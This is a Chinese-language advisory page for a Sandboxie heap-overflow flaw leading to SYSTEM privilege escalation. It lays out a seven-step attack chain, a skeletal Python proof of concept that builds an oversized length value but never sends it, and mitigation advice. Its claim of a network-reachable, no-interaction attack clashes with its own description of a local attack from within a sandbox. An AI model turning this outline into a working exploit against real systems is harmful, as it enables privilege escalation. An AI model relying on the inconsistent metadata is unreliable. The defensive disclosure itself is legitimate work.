CVE-2025-64721 Sandboxie堆溢出漏洞导致SYSTEM权限提升

漏洞信息

漏洞编号

CVE-2025-64721

漏洞类型

堆溢出

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Sandboxie

漏洞概述

CVE-2025-64721是Sandboxie中的一个严重安全漏洞，CVSS评分高达10.0分，属于紧急严重级别。该漏洞存在于Sandboxie 1.16.6及以下版本的SYSTEM级服务SbieSvc.exe中。由于SbieIniServer::RC4Crypt接口被不当暴露给沙箱进程，且在处理数据时未对长度参数进行充分的溢出检查，攻击者可以通过构造特定的数据长度值（如0xFFFFFFF0）触发整数溢出，导致堆缓冲区分配过小。当攻击者数据被拷贝到这个过小的缓冲区时，会发生堆溢出，从而实现任意代码执行，最终以SYSTEM权限完全控制主机。此漏洞无需任何认证或用户交互即可被利用，影响范围涵盖所有使用受影响版本Sandboxie的Windows系统。该漏洞已于1.16.7版本中修复。

技术细节

漏洞根源在于SbieSvc.exe服务中的SbieIniServer::RC4Crypt函数处理逻辑存在安全缺陷。当沙箱进程调用该RPC接口时，handler函数需要为数据分配缓冲区。问题出在计算所需分配大小时，代码将一个固定的头部大小与攻击者可控的value_len参数相加，但未进行整数溢出检查。当value_len设置为极大值（如0xFFFFFFF0）时，加法结果发生回绕（wrap around），导致实际分配的堆缓冲区远小于所需大小。攻击者随后可以将超过缓冲区容量的数据写入，由于堆溢出，恶意数据可以覆盖相邻内存区域的控制结构或函数指针。结合精心构造的ROP链或shellcode，攻击者能够劫持程序执行流，最终在主机上以SYSTEM级别权限执行任意代码。这一漏洞的危险之处在于它绕过了沙箱的隔离机制，利用沙箱进程获得了比预期更高的权限级别。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的访问权限，在沙箱进程内执行恶意代码

STEP 2

步骤2

攻击者构造包含超大value_len参数（0xFFFFFFF0）的RC4Crypt请求

STEP 3

步骤3

发送精心构造的RPC请求到SbieSvc.exe的SbieIniServer接口

STEP 4

步骤4

服务端handler计算分配大小时发生整数溢出回绕，分配远小于所需的缓冲区

STEP 5

步骤5

攻击者数据被写入过小的缓冲区，触发堆溢出，覆盖相邻内存

STEP 6

步骤6

利用堆溢出覆盖关键数据结构或函数指针，结合ROP链劫持执行流

STEP 7

步骤7

成功在SYSTEM权限下执行任意代码，完全控制主机操作系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct
import ctypes

# PoC for CVE-2025-64721 - Sandboxie SbieIniServer::RC4Crypt Heap Overflow
# This demonstrates triggering the integer overflow via large value_len parameter

def trigger_heap_overflow():
    """
    Trigger heap overflow in SbieIniServer::RC4Crypt by providing oversized value_len
    
    The vulnerability exists because:
    1. Handler adds fixed header size to caller-controlled value_len
    2. No overflow checking is performed
    3. Large value_len (e.g., 0xFFFFFFF0) causes allocation size wrap
    4. Data copy causes heap overflow
    """
    
    # Target the SbieIniServer RPC interface
    # Connection to SbieSvc.exe SYSTEM service
    
    # Malicious payload structure
    # value_len set to trigger integer overflow
    MALICIOUS_VALUE_LEN = 0xFFFFFFF0  # Causes overflow when + header_size
    
    # Craft malicious RC4Crypt request
    # The RPC interface UUID for SbieIniServer
    interface_uuid = "..."
    
    # Build the exploit packet
    packet = bytearray()
    
    # Header with controlled length
    packet += b'\x00\x00'  # Some header marker
    
    # The critical value_len that triggers overflow
    packet += struct.pack('<I', MALICIOUS_VALUE_LEN)  # Little-endian 32-bit
    
    # Padding to trigger overflow during copy
    # This will be written beyond the undersized buffer
    overflow_data = b'A' * 0x10000  # Large padding
    packet += overflow_data
    
    # Send to SbieSvc.exe via named pipe or RPC
    # pipe_name = "\\\\.\\pipe\\SbieSvc\\SbieIniServer"
    
    print(f"[*] Crafted malicious packet: {len(packet)} bytes")
    print(f"[*] value_len: 0x{MALICIOUS_VALUE_LEN:08X}")
    print(f"[*] Expected allocation size (wrapped): {0x10 + MALICIOUS_VALUE_LEN & 0xFFFFFFFF:08X}")
    print(f"[*] Sending exploit to SbieSvc.exe...")
    
    # In real attack, connect to RPC interface and send crafted packet
    # This would trigger heap overflow allowing code execution as SYSTEM
    
    return True

if __name__ == "__main__":
    trigger_heap_overflow()

影响范围

Sandboxie < 1.16.7

Sandboxie 1.16.6及以下版本

Sandboxie 1.16.0 - 1.16.6

防御指南

临时缓解措施

在无法立即升级的情况下，可以采取以下临时缓解措施：1）限制沙箱进程的权限，遵循最小权限原则；2）监控SbieSvc.exe服务的异常行为和大量内存分配；3）使用Windows Defender或其他终端防护软件检测恶意活动；4）启用应用白名单策略防止未知程序执行；5）考虑暂时禁用Sandboxie服务直到完成补丁更新。由于该漏洞无需认证即可被利用，最有效的缓解措施仍是尽快升级到修复版本1.16.7。